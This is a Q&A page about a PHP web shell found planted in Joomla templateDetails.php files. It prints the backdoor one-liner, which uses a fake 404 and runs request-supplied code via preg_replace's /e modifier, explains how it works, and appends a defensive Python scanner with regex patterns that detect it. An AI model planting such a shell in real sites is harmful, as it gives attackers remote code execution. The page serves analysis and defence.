Problem description
What does the code mean, and how can it be used by malicious hackers?
I just found, on the Joomla installation of a site I manage, many templateDetails.php files hidden in various folders, with the following code:
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
I promptly restored the site from a backup, changed all administrator passwords and hardened the site's security.
Can you explain how this kind of code can be used to steal from or damage a website?
Reference solution
Method 1:
I've commented the code below for you to explain:
<?php
// Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
    header("HTTP/1.0 404 Not Found"); // If that variable doesn't exist, send a 404

// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then
// in theory use the result as the preg_replace replacement (however in this case, that
// bit doesn't matter, as actually all we are looking to do is execute whatever has been
// passed through the request - basically doing eval(), but hiding it so it's not as
// obvious, and won't get picked up (in theory) by any installs that block eval (although
// in practice most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>
In short, it's a fancy way to use eval(), allowing them to pass through any code as a query string, and then execute it!
(by Drake, Liam Wiltshire)
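The scanner below is added here as an example and is not part of the question or the answer above. It takes the defender's side of the same mechanism: it walks a Joomla-style directory tree and reports every .php file carrying the indicators that make this shell recognisable (a preg_replace() pattern with the /e modifier, request data fed in as the replacement, @ error suppression, and a fake 404 gated on a request parameter). It uses only the Python standard library; the two sample files, the folder names in the temporary tree and the indicator names are constructed for the demo. Note that PHP 7.0 removed the /e modifier entirely, so on a current PHP build this particular trick no longer executes, but the planted file is still an indicator of compromise worth locating.

```python
"""Defender-side scanner for the preg_replace /e backdoor shape discussed above.

Added example, not code from the original question or answer. It walks a tree of
.php files and names the indicators found in each, then flags the decisive
combination: user input evaluated through preg_replace's /e modifier.
"""
import os
import re
import tempfile

# One compiled regex per indicator; the dict key is the name shown in the report.
INDICATORS = {
    # preg_replace('/.../e', ...): the /e modifier evaluates the replacement as PHP.
    "preg_replace_e_modifier": re.compile(
        r"""preg_replace\s*\(\s*(['"])/[^'"]*/[A-Za-z]*e[A-Za-z]*\1"""),
    # Request data supplied as the replacement argument of preg_replace.
    "user_input_as_replacement": re.compile(
        r"""preg_replace\s*\([^;]*?,\s*@?\$_(REQUEST|GET|POST|COOKIE)\s*\["""),
    # @ on the call or the superglobal keeps warnings out of the server error log.
    "error_suppression": re.compile(
        r"""@\s*(preg_replace\s*\(|\$_(REQUEST|GET|POST|COOKIE))"""),
    # A 404 sent only when the trigger parameter is missing hides the file from casual probing.
    "fake_404_gate": re.compile(
        r"""isset\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)[^;]*?header\s*\(\s*['"]HTTP/1\.[01] 404"""),
}

# Constructed sample with the shape quoted in the question (trigger name as on the page).
BACKDOOR_SAMPLE = """<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found");
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>"""

# Constructed benign sample: an ordinary preg_replace and an ordinary 404, no request data.
BENIGN_SAMPLE = """<?php
$slug = preg_replace('/[^a-z0-9]+/i', '-', $title);
if (!file_exists($path)) header("HTTP/1.0 404 Not Found");
?>"""


def scan_source(src: str) -> list[str]:
    """Return the names of all indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def is_backdoor(found: list[str]) -> bool:
    """The decisive combination: request data evaluated through preg_replace /e."""
    return {"preg_replace_e_modifier", "user_input_as_replacement"} <= set(found)


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root, scan every .php file, and map relative path -> indicators found."""
    report: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            # Webshells are often written with odd encodings; never let a decode error skip a file.
            with open(path, encoding="utf-8", errors="ignore") as fh:
                found = scan_source(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


def demo() -> dict[str, list[str]]:
    """Plant both samples in a throwaway tree (constructed folder names) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "templates", "example"))
        os.makedirs(os.path.join(root, "images"))
        planted = {
            os.path.join("templates", "example", "templateDetails.php"): BACKDOOR_SAMPLE,
            os.path.join("images", "templateDetails.php"): BACKDOOR_SAMPLE,
            os.path.join("templates", "example", "helper.php"): BENIGN_SAMPLE,
        }
        for rel, body in planted.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, found in sorted(demo().items()):
        verdict = "BACKDOOR" if is_backdoor(found) else "review"
        print(f"{verdict:8} {rel_path}: {', '.join(found)}")
```

Run it against a real document root by calling scan_tree("/path/to/joomla") instead of demo(); anything flagged as BACKDOOR should be treated as a compromise of the whole install, not just that file, since the shell only exists because something else already wrote it there.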